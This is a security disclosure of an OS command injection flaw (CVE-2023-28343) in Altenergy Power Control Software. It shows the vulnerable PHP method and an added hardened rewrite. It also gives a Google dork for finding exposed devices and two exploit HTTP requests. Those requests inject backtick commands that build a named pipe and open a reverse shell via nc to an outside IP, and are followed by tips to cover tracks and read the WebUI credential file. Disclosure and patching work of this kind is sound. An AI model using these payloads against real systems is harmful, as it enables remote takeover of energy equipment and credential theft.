CVE-2023-28343 (ahmedalroky/Disclosures, os_command_injection.md)
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
title : OS command injection affects "Altenergy Power Control Software"
SW ver : C1.2.5
Vendor : https://apsystems.com/
Google Dork : intitle:"Altenergy Power Control Software"
Affected device : ENERGY COMMUNICATION UNIT
vulnerable code :
"/home/local_web/pagesapplication/models/management_model.php"

```php
public function set_timezone() {
    $results = array();
    // get the timezone selected on the page
    $timezone = $this->input->post('timezone');
    if(strlen($timezone) == 0)
        $timezone = "Asia/Taipei";
    // set the Linux system timezone
    // user input is interpolated straight into a shell command and run with system()
    $cmd = "cp /usr/share/zoneinfo/$timezone /etc/localtime";
    system($cmd);
    // save the timezone to the config file
    $fp = @fopen("/etc/yuneng/timezone.conf",'w');
    if($fp){
        fwrite($fp, $timezone);
        fclose($fp);
    }
}
```
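For comparison, a hardened form of the same method, written here as an added example and not taken from the vendor's code: the submitted value is checked against PHP's own list of zone identifiers (an allowlist, so no shell metacharacter can pass) and the file is copied with PHP file functions rather than `system("cp ...")`. It assumes the same CodeIgniter-style `$this->input->post()` and `show_error()` helpers the original snippet relies on; the class name is hypothetical.

```php
<?php
// Added example, not the vendor's code: a hardened set_timezone() that never
// passes user input to a shell. Assumes a CodeIgniter-style controller where
// $this->input->post() and show_error() exist, as in the original snippet.
class Management_hardened
{
    private const DEFAULT_TZ = 'Asia/Taipei';
    private const ZONEINFO   = '/usr/share/zoneinfo';
    private const TZ_CONF    = '/etc/yuneng/timezone.conf';

    // Allowlist check: only an identifier PHP itself knows is accepted, so a
    // value containing backticks, semicolons or "../" can never reach the OS.
    public static function validateTimezone(?string $candidate): ?string
    {
        if ($candidate === null || $candidate === '') {
            return self::DEFAULT_TZ;
        }
        return in_array($candidate, DateTimeZone::listIdentifiers(), true)
            ? $candidate
            : null;
    }

    // Apply a validated zone with PHP file functions instead of system("cp ...").
    public static function applyTimezone(string $tz): bool
    {
        $base = realpath(self::ZONEINFO);
        $src  = realpath(self::ZONEINFO . '/' . $tz);
        // Defence in depth: the resolved file must still live under zoneinfo.
        if ($base === false || $src === false || strpos($src, $base . '/') !== 0) {
            return false;
        }
        if (!copy($src, '/etc/localtime')) {
            return false;
        }
        return file_put_contents(self::TZ_CONF, $tz) !== false;
    }

    public function set_timezone()
    {
        $tz = self::validateTimezone($this->input->post('timezone'));
        if ($tz === null) {
            show_error('invalid timezone', 400); // reject, do not silently fall back
            return;
        }
        if (!self::applyTimezone($tz)) {
            show_error('failed to apply timezone', 500);
        }
    }
}
```

A request body such as the one in the exploit section (`timezone=` followed by a backtick-quoted command) is rejected by `validateTimezone()` before any file or process operation takes place.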
Exploit :
HTTP request :

```http
POST /index.php/management/set_timezone HTTP/1.1
Host: 78.218.230.32:8081
Content-Length: 33
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://78.218.230.32:8081
Referer: http://78.218.230.32:8081/index.php/management/datetime
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

timezone=`mknod /tmp/backpipe p `
```
HTTP request :

```http
POST /index.php/management/set_timezone HTTP/1.1
Host: 78.218.230.32:8081
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://78.218.230.32:8081
Referer: http://78.218.230.32:8081/index.php/management/datetime
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

timezone=`/bin/sh 0</tmp/backpipe | nc 156.197.154.12 4444 1>/tmp/backpipe`
```
POC :
**note**
- Please run the following command after getting a shell, to avoid breaking the WebUI (the injected value is otherwise written into the timezone config file):
`echo Asia/Taipei > /etc/yuneng/timezone.conf`
Important files to check :
- /etc/yuneng/passwd.conf : this file contains the credentials for the WebUI.